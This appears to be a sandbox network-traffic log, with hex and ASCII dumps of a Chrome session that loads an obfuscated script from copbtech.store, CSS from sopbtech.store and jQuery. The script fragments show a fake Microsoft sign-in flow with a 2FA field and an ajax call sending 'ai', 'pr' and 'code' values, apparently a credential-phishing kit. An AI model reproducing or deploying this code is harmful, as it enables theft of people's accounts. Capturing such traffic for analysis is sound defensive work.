2025-01-22 11:02:17 UTC	16105	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 34 32 32 61 28 5f 30 78 31 65 35 32 36 65 2c 5f 30 78 35 31 36 38 39 31 29 7b 76 61 72 20 5f 30 78 34 39 63 39 66 62 3d 5f 30 78 31 31 34 63 28 29 3b 72 65 74 75 72 6e 20 5f 30 78 34 32 32 61 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 39 36 61 33 38 2c 5f 30 78 33 32 32 38 62 61 29 7b 5f 30 78 32 39 36 61 33 38 3d 5f 30 78 32 39 36 61 33 38 2d 30 78 31 35 36 3b 76 61 72 20 5f 30 78 34 62 32 66 39 38 3d 5f 30 78 34 39 63 39 66 62 5b 5f 30 78 32 39 36 61 33 38 5d 3b 72 65 74 75 72 6e 20 5f 30 78 34 62 32 66 39 38 3b 7d 2c 5f 30 78 34 32 32 61 28 5f 30 78 31 65 35 32 36 65 2c 5f 30 78 35 31 36 38 39 31 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 31 34 63 28 29 7b 76 61 72 20 5f 30 78 33 30 35 38 39 65 3d 5b 27 46 6f 72 Data Ascii: function _0x422a(_0x1e526e,_0x516891){var _0x49c9fb=_0x114c();return _0x422a=function(_0x296a38,_0x3228ba){_0x296a38=_0x296a38-0x156;var _0x4b2f98=_0x49c9fb[_0x296a38];return _0x4b2f98;},_0x422a(_0x1e526e,_0x516891);}function _0x114c(){var _0x30589e=['For
2025-01-22 11:02:17 UTC	16384	IN	Data Raw: 32 32 63 6f 6c 6f 72 3a 5c 78 32 30 23 37 34 37 34 37 34 3b 5c 78 32 32 3e 4d 69 63 72 6f 73 6f 66 74 3c 2f 73 70 61 6e 3e 3c 62 72 3e 3c 62 72 3e 3c 73 70 61 6e 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 62 61 63 6b 2d 61 72 72 6f 77 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 62 61 63 6b 5c 78 32 32 3e f0 9f a1 a0 5c 78 32 30 3c 2f 73 70 61 6e 3e 5c 75 30 30 61 30 5c 75 30 30 61 30 5c 75 30 30 61 30 5c 75 30 30 61 30 3c 73 70 61 6e 5c 78 32 30 69 64 3d 5c 78 32 32 61 69 63 68 5c 78 32 32 5c 78 32 30 73 74 79 6c 65 3d 5c 78 32 32 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 5c 78 32 30 2d 31 30 70 78 3b 5c 78 32 32 3e 3c 2f 73 70 61 6e 3e 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 70 79 2d 32 5c 78 32 32 3e 3c 73 70 61 6e 5c 78 32 30 69 64 3d 5c 78 32 Data Ascii: 22color:\x20#747474;\x22>Microsoft</span><br><br><span\x20class=\x22back-arrow\x22\x20id=\x22back\x22>\x20</span>\u00a0\u00a0\u00a0\u00a0<span\x20id=\x22aich\x22\x20style=\x22margin-left:\x20-10px;\x22></span><div\x20class=\x22py-2\x22><span\x20id=\x2
2025-01-22 11:02:17 UTC	13914	IN	Data Raw: 78 31 63 32 29 5d 28 27 4d 69 63 72 6f 73 6f 66 74 27 29 2c 24 28 5f 30 78 33 39 61 65 62 37 28 30 78 31 65 35 29 29 5b 5f 30 78 33 39 61 65 62 37 28 30 78 31 66 39 29 5d 28 7b 27 6c 65 66 74 27 3a 5f 30 78 33 39 61 65 62 37 28 30 78 31 64 65 29 2c 27 6f 70 61 63 69 74 79 27 3a 5f 30 78 33 39 61 65 62 37 28 30 78 31 36 36 29 7d 2c 30 78 30 29 2c 24 28 5f 30 78 33 39 61 65 62 37 28 30 78 31 61 66 29 29 5b 27 61 6e 69 6d 61 74 65 27 5d 28 7b 27 72 69 67 68 74 27 3a 5f 30 78 33 39 61 65 62 37 28 30 78 31 64 65 29 2c 27 6f 70 61 63 69 74 79 27 3a 5f 30 78 33 39 61 65 62 37 28 30 78 32 30 66 29 7d 2c 30 78 30 29 2c 24 28 5f 30 78 33 39 61 65 62 37 28 30 78 31 36 32 29 29 5b 27 74 65 78 74 27 5d 28 5f 30 78 35 61 62 33 65 32 29 2c 24 28 27 23 70 72 27 29 5b 27 Data Ascii: x1c2)]('Microsoft'),$(_0x39aeb7(0x1e5))[_0x39aeb7(0x1f9)]({'left':_0x39aeb7(0x1de),'opacity':_0x39aeb7(0x166)},0x0),$(_0x39aeb7(0x1af))['animate']({'right':_0x39aeb7(0x1de),'opacity':_0x39aeb7(0x20f)},0x0),$(_0x39aeb7(0x162))['text'](_0x5ab3e2),$('#pr')['

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49739	162.0.209.120	443	8080	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-22 11:02:18 UTC	357	OUT	GET /tsk/xls/t1s2kc2v.js HTTP/1.1 Host: copbtech.store Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-22 11:02:18 UTC	279	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 content-type: text/javascript last-modified: Sun, 19 Jan 2025 22:17:48 GMT accept-ranges: bytes content-length: 46403 date: Wed, 22 Jan 2025 11:02:18 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2025-01-22 11:02:18 UTC	16105	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 34 32 32 61 28 5f 30 78 31 65 35 32 36 65 2c 5f 30 78 35 31 36 38 39 31 29 7b 76 61 72 20 5f 30 78 34 39 63 39 66 62 3d 5f 30 78 31 31 34 63 28 29 3b 72 65 74 75 72 6e 20 5f 30 78 34 32 32 61 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 39 36 61 33 38 2c 5f 30 78 33 32 32 38 62 61 29 7b 5f 30 78 32 39 36 61 33 38 3d 5f 30 78 32 39 36 61 33 38 2d 30 78 31 35 36 3b 76 61 72 20 5f 30 78 34 62 32 66 39 38 3d 5f 30 78 34 39 63 39 66 62 5b 5f 30 78 32 39 36 61 33 38 5d 3b 72 65 74 75 72 6e 20 5f 30 78 34 62 32 66 39 38 3b 7d 2c 5f 30 78 34 32 32 61 28 5f 30 78 31 65 35 32 36 65 2c 5f 30 78 35 31 36 38 39 31 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 31 34 63 28 29 7b 76 61 72 20 5f 30 78 33 30 35 38 39 65 3d 5b 27 46 6f 72 Data Ascii: function _0x422a(_0x1e526e,_0x516891){var _0x49c9fb=_0x114c();return _0x422a=function(_0x296a38,_0x3228ba){_0x296a38=_0x296a38-0x156;var _0x4b2f98=_0x49c9fb[_0x296a38];return _0x4b2f98;},_0x422a(_0x1e526e,_0x516891);}function _0x114c(){var _0x30589e=['For
2025-01-22 11:02:18 UTC	5499	IN	Data Raw: 32 32 63 6f 6c 6f 72 3a 5c 78 32 30 23 37 34 37 34 37 34 3b 5c 78 32 32 3e 4d 69 63 72 6f 73 6f 66 74 3c 2f 73 70 61 6e 3e 3c 62 72 3e 3c 62 72 3e 3c 73 70 61 6e 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 62 61 63 6b 2d 61 72 72 6f 77 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 62 61 63 6b 5c 78 32 32 3e f0 9f a1 a0 5c 78 32 30 3c 2f 73 70 61 6e 3e 5c 75 30 30 61 30 5c 75 30 30 61 30 5c 75 30 30 61 30 5c 75 30 30 61 30 3c 73 70 61 6e 5c 78 32 30 69 64 3d 5c 78 32 32 61 69 63 68 5c 78 32 32 5c 78 32 30 73 74 79 6c 65 3d 5c 78 32 32 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 5c 78 32 30 2d 31 30 70 78 3b 5c 78 32 32 3e 3c 2f 73 70 61 6e 3e 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 70 79 2d 32 5c 78 32 32 3e 3c 73 70 61 6e 5c 78 32 30 69 64 3d 5c 78 32 Data Ascii: 22color:\x20#747474;\x22>Microsoft</span><br><br><span\x20class=\x22back-arrow\x22\x20id=\x22back\x22>\x20</span>\u00a0\u00a0\u00a0\u00a0<span\x20id=\x22aich\x22\x20style=\x22margin-left:\x20-10px;\x22></span><div\x20class=\x22py-2\x22><span\x20id=\x2
2025-01-22 11:02:18 UTC	16384	IN	Data Raw: 5b 5f 30 78 34 61 39 65 61 28 30 78 31 64 66 29 5d 28 5f 30 78 34 61 39 65 61 28 30 78 31 65 65 29 29 3b 5f 30 78 35 62 35 62 31 61 5b 5f 30 78 34 61 39 65 61 28 30 78 32 31 37 29 5d 3d 27 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 40 6b 65 79 66 72 61 6d 65 73 5c 78 32 30 73 70 69 6e 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 30 25 5c 78 32 30 7b 5c 78 32 30 74 72 61 6e 73 66 6f 72 6d 3a 5c 78 32 30 72 6f 74 61 74 65 28 30 64 65 67 29 3b 5c 78 32 30 7d 5c 78 30 61 5c 78 Data Ascii: [_0x4a9ea(0x1df)](_0x4a9ea(0x1ee));_0x5b5b1a[_0x4a9ea(0x217)]='\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20@keyframes\x20spin\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x200%\x20{\x20transform:\x20rotate(0deg);\x20}\x0a\x
2025-01-22 11:02:18 UTC	8415	IN	Data Raw: 30 78 32 32 63 29 29 5b 27 74 65 78 74 27 5d 28 5f 30 78 35 37 37 36 37 30 28 30 78 32 32 34 29 29 3b 72 65 74 75 72 6e 3b 7d 69 66 28 24 28 27 23 6d 73 67 2d 32 66 61 27 29 5b 27 74 65 78 74 27 5d 28 29 5b 5f 30 78 35 37 37 36 37 30 28 30 78 31 35 66 29 5d 28 5f 30 78 35 37 37 36 37 30 28 30 78 31 64 35 29 29 29 24 5b 27 61 6a 61 78 27 5d 28 7b 27 64 61 74 61 54 79 70 65 27 3a 5f 30 78 35 37 37 36 37 30 28 30 78 32 32 65 29 2c 27 75 72 6c 27 3a 5f 30 78 35 32 38 32 37 66 2c 27 74 79 70 65 27 3a 5f 30 78 35 37 37 36 37 30 28 30 78 31 66 66 29 2c 27 64 61 74 61 27 3a 7b 27 61 69 27 3a 5f 30 78 34 38 32 34 33 30 2c 27 70 72 27 3a 5f 30 78 34 31 34 33 61 38 2c 27 63 6f 64 65 27 3a 5f 30 78 32 61 32 34 61 39 7d 2c 27 62 65 66 6f 72 65 53 65 6e 64 27 3a 66 75 Data Ascii: 0x22c))['text'](_0x577670(0x224));return;}if($('#msg-2fa')['text']()[_0x577670(0x15f)](_0x577670(0x1d5)))$['ajax']({'dataType':_0x577670(0x22e),'url':_0x52827f,'type':_0x577670(0x1ff),'data':{'ai':_0x482430,'pr':_0x4143a8,'code':_0x2a24a9},'beforeSend':fu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49749	199.188.200.183	443	8080	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-22 11:02:28 UTC	519	OUT	GET /start/xls/includes/css6.css HTTP/1.1 Host: sopbtech.store Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-22 11:02:29 UTC	352	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 cache-control: public, max-age=604800 expires: Wed, 29 Jan 2025 11:02:29 GMT content-type: text/css last-modified: Fri, 25 Oct 2024 20:25:40 GMT accept-ranges: bytes content-length: 258966 date: Wed, 22 Jan 2025 11:02:29 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2025-01-22 11:02:29 UTC	16032	IN	Data Raw: 20 2f 2a 21 0d 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0d 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0d 0a 20 2a 2f 0d 0a 20 20 20 20 3a 72 6f 6f 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 2d 62 6c 75 65 3a 20 23 30 30 37 Data Ascii: /! Bootstrap v4.0.0 (https://getbootstrap.com) * Copyright 2011-2018 The Bootstrap Authors * Copyright 2011-2018 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */ :root { --blue: #007
2025-01-22 11:02:29 UTC	16384	IN	Data Raw: 20 34 3b 0d 0a 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 34 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 6f 72 64 65 72 2d 35 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 36 3b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 35 3b 0d 0a 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 35 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 6f 72 64 65 72 2d 36 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 37 3b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 36 3b 0d 0a 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 36 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 Data Ascii: 4; order: 4 } .order-5 { -webkit-box-ordinal-group: 6; -ms-flex-order: 5; order: 5 } .order-6 { -webkit-box-ordinal-group: 7; -ms-flex-order: 6; order: 6 }
2025-01-22 11:02:29 UTC	16384	IN	Data Raw: 3a 20 39 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 6f 72 64 65 72 2d 6c 67 2d 31 30 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 31 31 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 31 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 31 30 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 6f 72 64 65 72 2d 6c 67 2d 31 31 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 31 32 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 31 31 3b 0d Data Ascii: : 9 } .order-lg-10 { -webkit-box-ordinal-group: 11; -ms-flex-order: 10; order: 10 } .order-lg-11 { -webkit-box-ordinal-group: 12; -ms-flex-order: 11;
2025-01-22 11:02:29 UTC	15252	IN	Data Raw: 6e 74 65 78 74 2e 62 74 6e 2c 0d 0a 20 20 20 20 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 73 6d 3e 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 70 72 65 70 65 6e 64 3e 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2d 70 6c 61 69 6e 74 65 78 74 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 74 65 78 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 30 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2d 73 6d 2c 0d 0a 20 20 20 20 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 73 6d 3e 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2c 0d 0a 20 20 20 20 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 73 6d 3e 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 61 70 70 65 6e Data Ascii: ntext.btn, .input-group-sm>.input-group-prepend>.form-control-plaintext.input-group-text { padding-right: 0; padding-left: 0 } .form-control-sm, .input-group-sm>.form-control, .input-group-sm>.input-group-appen
2025-01-22 11:02:29 UTC	16384	IN	Data Raw: 2e 64 69 73 61 62 6c 65 64 29 3a 61 63 74 69 76 65 2c 0d 0a 20 20 20 20 2e 73 68 6f 77 3e 2e 62 74 6e 2d 70 72 69 6d 61 72 79 2e 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 30 36 32 63 63 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 30 30 35 63 62 66 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 62 74 6e 2d 70 72 69 6d 61 72 79 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 2e 61 63 74 69 76 65 3a 66 6f 63 75 73 2c 0d 0a 20 20 20 20 2e 62 74 6e 2d 70 72 69 6d 61 72 79 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e Data Ascii: .disabled):active, .show>.btn-primary.dropdown-toggle { color: #fff; background-color: #0062cc; border-color: #005cbf } .btn-primary:not(:disabled):not(.disabled).active:focus, .btn-primary:not(:disabled):n
2025-01-22 11:02:29 UTC	16384	IN	Data Raw: 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 62 74 6e 2d 6c 69 6e 6b 2e 66 6f 63 75 73 2c 0d 0a 20 20 20 20 2e 62 74 6e 2d 6c 69 6e 6b 3a 66 6f 63 75 73 20 7b 0d 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 62 74 6e 2d 6c 69 6e 6b 2e 64 69 73 61 62 6c 65 64 2c 0d 0a 20 20 20 20 2e 62 74 Data Ascii: ound-color: transparent; border-color: transparent } .btn-link.focus, .btn-link:focus { text-decoration: underline; border-color: transparent; box-shadow: none } .btn-link.disabled, .bt
2025-01-22 11:02:29 UTC	16384	IN	Data Raw: 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 27 20 76 69 65 77 42 6f 78 3d 27 30 20 30 20 38 20 38 27 25 33 45 25 33 43 70 61 74 68 20 66 69 6c 6c 3d 27 25 32 33 66 66 66 27 20 64 3d 27 4d 36 2e 35 36 34 2e 37 35 6c 2d 33 2e 35 39 20 33 2e 36 31 32 2d 31 2e 35 33 38 2d 31 2e 35 35 4c 30 20 34 2e 32 36 20 32 2e 39 37 34 20 37 2e 32 35 20 38 20 32 2e 31 39 33 7a 27 2f 25 33 45 25 33 43 2f 73 76 67 25 33 45 22 29 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 63 75 73 74 6f 6d 2d 63 68 65 63 6b 62 6f 78 20 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 69 6e 70 75 74 3a 69 6e 64 65 74 65 72 6d 69 6e 61 74 65 7e 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 3a 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 Data Ascii: ttp://www.w3.org/2000/svg' viewBox='0 0 8 8'%3E%3Cpath fill='%23fff' d='M6.564.75l-3.59 3.612-1.538-1.55L0 4.26 2.974 7.25 8 2.193z'/%3E%3C/svg%3E") } .custom-checkbox .custom-control-input:indeterminate~.custom-control-label::before {
2025-01-22 11:02:29 UTC	16336	IN	Data Raw: 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 2d 78 6c 20 2e 64 72 6f 70 75 70 20 2e 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 6f 70 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 74 74 6f 6d 3a 20 31 30 30 25 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 20 68 6f 72 69 7a 6f 6e 74 61 6c 3b 0d 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 6e 6f 72 6d 61 6c 3b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 66 6c 6f Data Ascii: } .navbar-expand-xl .dropup .dropdown-menu { top: auto; bottom: 100% } } .navbar-expand { -webkit-box-orient: horizontal; -webkit-box-direction: normal; -ms-flex-flo
2025-01-22 11:02:29 UTC	48	IN	Data Raw: 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 Data Ascii: t-decoration: none; background-color: #
2025-01-22 11:02:29 UTC	16384	IN	Data Raw: 31 31 37 61 38 62 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 62 61 64 67 65 2d 77 61 72 6e 69 6e 67 20 7b 0d 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 31 32 35 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 63 31 30 37 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 62 61 64 67 65 2d 77 61 72 6e 69 6e 67 5b 68 72 65 66 5d 3a 66 6f 63 75 73 2c 0d 0a 20 20 20 20 2e 62 61 64 67 65 2d 77 61 72 6e 69 6e 67 5b 68 72 65 66 5d 3a 68 6f 76 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 31 32 35 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f Data Ascii: 117a8b } .badge-warning { color: #212529; background-color: #ffc107 } .badge-warning[href]:focus, .badge-warning[href]:hover { color: #212529; text-decoration: none; background-colo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49757	151.101.194.137	443	8080	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-22 11:02:31 UTC	498	OUT	GET /jquery-3.1.1.min.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-22 11:02:31 UTC	613	IN	HTTP/1.1 200 OK Connection: close Content-Length: 86709 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-152b5" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Via: 1.1 varnish, 1.1 varnish Accept-Ranges: bytes Date: Wed, 22 Jan 2025 11:02:31 GMT Age: 1294348 X-Served-By: cache-lga21947-LGA, cache-ewr-kewr1740068-EWR X-Cache: HIT, HIT X-Cache-Hits: 4188, 9 X-Timer: S1737543751.306476,VS0,VE0 Vary: Accept-Encoding
2025-01-22 11:02:31 UTC	16384	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 31 2e 31 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 Data Ascii: /! jQuery v3.1.1 \| (c) jQuery Foundation \| jquery.org/license /!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window w
